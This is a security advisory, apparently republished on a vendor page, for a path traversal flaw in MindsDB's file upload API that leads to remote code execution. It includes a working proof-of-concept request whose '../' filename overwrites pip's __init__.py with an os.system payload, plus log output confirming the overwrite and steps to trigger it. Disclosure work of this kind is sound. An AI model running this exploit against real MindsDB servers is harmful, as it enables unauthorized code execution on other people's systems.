GHSA-4894-xqv6-vrfq
HIGHMindsDB: Path Traversal in /api/files Leading to Remote Code Execution
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
mindsdbReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.
Description
Summary
There is a path traversal vulnerability in Mindsdb's /api/files interface, which an authenticated attacker can exploit to achieve remote command execution.
Details
The vulnerability exists in the "Upload File" module, which corresponds to the API endpoint /api/files. The affected code is located at mindsdb/api/http/namespaces/file.py:
@ns_conf.route("/<name>")
@ns_conf.param("name", "MindsDB's name for file")
class File(Resource):
@ns_conf.doc("put_file")
@api_endpoint_metrics('PUT', '/files/file')
def put(self, name: str):
"""add new file
params in FormData:
- file
- original_file_name [optional]
"""
data = {}
mindsdb_file_name = name
existing_file_names = ca.file_controller.get_files_names()
def on_field(field):
name = field.field_name.decode()
value = field.value.decode()
data[name] = value
file_object = None
def on_file(file):
nonlocal file_object
data["file"] = file.file_name.decode()
file_object = file.file_object
temp_dir_path = tempfile.mkdtemp(prefix="mindsdb_file_")
if request.headers["Content-Type"].startswith("multipart/form-data"):
parser = multipart.create_form_parser(
headers=request.headers,
on_field=on_field,
on_file=on_file,
config={
"UPLOAD_DIR": temp_dir_path.encode(), # bytes required
"UPLOAD_KEEP_FILENAME": True,
"UPLOAD_KEEP_EXTENSIONS": True,
"MAX_MEMORY_FILE_SIZE": 0,
},
)
while True:
chunk = request.stream.read(8192)
if not chunk:
break
parser.write(chunk)
parser.finalize()
parser.close()
if file_object is not None:
if not file_object.closed:
try:
file_object.flush()
except (AttributeError, ValueError, OSError):
logger.debug("Failed to flush file_object before closing.", exc_info=True)
file_object.close()
file_object = None
else:
data = request.json
Since the multipart file upload does not perform security checks on the uploaded file path, an attacker can perform path traversal by using ../ sequences in the filename field. The file write operation occurs before calling clear_filename and save_file, meaning there is no filtering of filenames or file types, allowing arbitrary content to be written to any path on the server.
PoC
This vulnerability can be exploited to overwrite existing executable files, which retain their executable permissions after being overwritten. In addition to conventional file upload exploitation methods, we provide a way to achieve Remote Code Execution (RCE) by leveraging MindsDB's own functionality.
The API endpoint /<handler_name>/install is used to install handlers, which internally calls install_dependencies to install dependencies via pip. This function executes pip using subprocess.Popen. Therefore, an attacker can:
- Exploit the vulnerability to overwrite /venv/lib/python3.10/site-packages/pip/init.py with a malicious Python script.
- Trigger the execution of the malicious script by calling /<handler_name>/install, which invokes pip.
Exploit:
PUT /api/files/mm HTTP/1.1
Host: ip:47334
Content-Length: 579
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv9dZC0cAHLlHSHD9
Origin: http://ip:47334
Referer: http://ip:47334/fileUpload
Accept-Encoding: gzip, deflate, br
Accept-Language: zh,en;q=0.9,zh-CN;q=0.8
Cookie: bid=87948125-5042-4fc8-a692-9cbf71e387be
Connection: keep-alive
------WebKitFormBoundaryv9dZC0cAHLlHSHD9
Content-Disposition: form-data; name="name"
mm
------WebKitFormBoundaryv9dZC0cAHLlHSHD9
Content-Disposition: form-data; name="source"
mm
------WebKitFormBoundaryv9dZC0cAHLlHSHD9
Content-Disposition: form-data; name="source_type"
file
------WebKitFormBoundaryv9dZC0cAHLlHSHD9
Content-Disposition: form-data; name="file"; filename="../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py"
Content-Type: text/plain
import os
os.system("touch /tmp/rce_by_hacker")
------WebKitFormBoundaryv9dZC0cAHLlHSHD9--
After sending this request, you can observe the logs in Docker's output:
2025-05-30 02:26:52,432 http INFO python_multipart.multipart: Opening a file on disk
2025-05-30 02:26:52,433 http INFO python_multipart.multipart: Saving with filename in: b'/root/mdb_storage/tmp/mindsdb_byom_file_89h0zcz0'
2025-05-30 02:26:52,433 http INFO python_multipart.multipart: Opening file: b'/root/mdb_storage/tmp/mindsdb_byom_file_89h0zcz0/../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py'
At this point, you can see that the file has been successfully overwritten:
root@e445c93b2fd5:/mindsdb# cat /venv/lib/python3.10/site-packages/pip/__init__.py
import os
os.system("touch /tmp/rce_by_hacker")
Afterwards, install any handler in the UI, and you will see that the file rce_by_hacker is successfully created in the /tmp directory. The same result can also be achieved by sending an API request to trigger it.
Credit
This vulnerability was discovered by:
- XlabAI Team of Tencent Xuanwu Lab
- Atuin Automated Vulnerability Discovery Engine
If there are any questions regarding the vulnerability details, please feel free to reach out to MindsDB for further discussion at [email protected].
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | mindsdb | all versions | 25.9.1.1 |
Research use only. For defensive security, authorized penetration testing, and academic research only. Never execute exploit code against systems without explicit written authorization.
MindsDB 25.9.1.1 - Path Traversal
by thewhiteh4t · May 4, 2026
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for mindsdb. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update mindsdb to 25.9.1.1 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-4894-xqv6-vrfq is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-4894-xqv6-vrfq is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-4894-xqv6-vrfq. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-4894-xqv6-vrfq in your dependencies?
O3 detects GHSA-4894-xqv6-vrfq across PyPI dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.